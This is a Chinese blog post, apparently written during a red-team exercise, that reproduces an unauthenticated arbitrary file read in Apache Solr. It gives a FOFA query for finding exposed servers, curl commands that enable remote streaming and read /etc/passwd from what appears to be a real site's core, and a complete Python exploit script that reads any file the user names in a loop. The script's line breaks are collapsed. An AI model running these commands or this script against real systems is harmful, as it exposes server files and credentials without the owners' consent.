这周在hw,水一篇文章,记录一下漏洞利用,当一个合格的脚本小子
✔ 0x01 漏洞描述
由于Apache Solr默认安装时未开启身份验证,导致未经身份验证的攻击者可利用Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,从而使攻击者可以在未授权的情况下获取目标服务器敏感文件。
听说报给官方后,官方拒绝修复,认为这不是一个漏洞,比一些src还离谱,人家起码会给个内部已知👀
✔ 0x02 漏洞影响
✔ 0x03 漏洞复现
fofa 语法:app="Solr"
3.1 获取 core name,拼接url
http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json
Core name为:arabnews
,那么使用的url 为 http://xxx.xxx.xxx.xxx/solr/arabnews/config
curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx/solr/arabnews/config -H 'Content-type:application/json'继续使用 core name 拼接 http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams
curl "http://xxx.xxx.xxx.xxx/solr/arabnews/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"3.2 攻击
✔ 0x04 漏洞POC
PeiQi文库的大佬已经写好了,我改了一点小毛病,读取完返回的值不一定是json,我复现的时候就遇到了这个问题,将json处理删掉了
#!/usr/bin/python3# -*- coding:utf-8 -*-# @Author : PeiQiimport requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')print('+ \033[34m公众号 : PeiQi文库 \033[0m')print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')print('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m')print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')print('+ \033[36mFile >>> 文件名称或目录 \033[0m')print('+------------------------------------------')def POC_1(target_url):core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"try:response = requests.request("GET", url=core_url, timeout=10)core_name = list(json.loads(response.text)["status"])[0]print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")return core_nameexcept:print("\033[31m[x] 目标Url漏洞利用失败\033[0m")sys.exit(0)def POC_2(target_url, core_name):vuln_url = target_url + "/solr/" + core_name + "/config"headers = {"Content-type":"application/json"}data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))if "responseHeader" in response.text and response.status_code == 200:print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))else:print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))sys.exit(0)except Exception as e:print("\033[31m[x] 请求失败 \033[0m", e)def POC_3(target_url, core_name, File_name):vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)headers = {"Content-Type": "application/x-www-form-urlencoded"}data = 'stream.url=file://{}'.format(File_name)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)if "No such file or directory" in response.text:print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))else:print("\033[36m[o] 响应为:\n{} \033[0m".format(response.text))except Exception as e:print("\033[31m[x] 请求失败 \033[0m", e)if __name__ == '__main__':title()target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))core_name = POC_1(target_url)POC_2(target_url, core_name)while True:File_name = str(input("\033[35mFile >>> \033[0m"))POC_3(target_url, core_name, File_name)
0x04 参考
文章转载自谁不想当剑仙,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
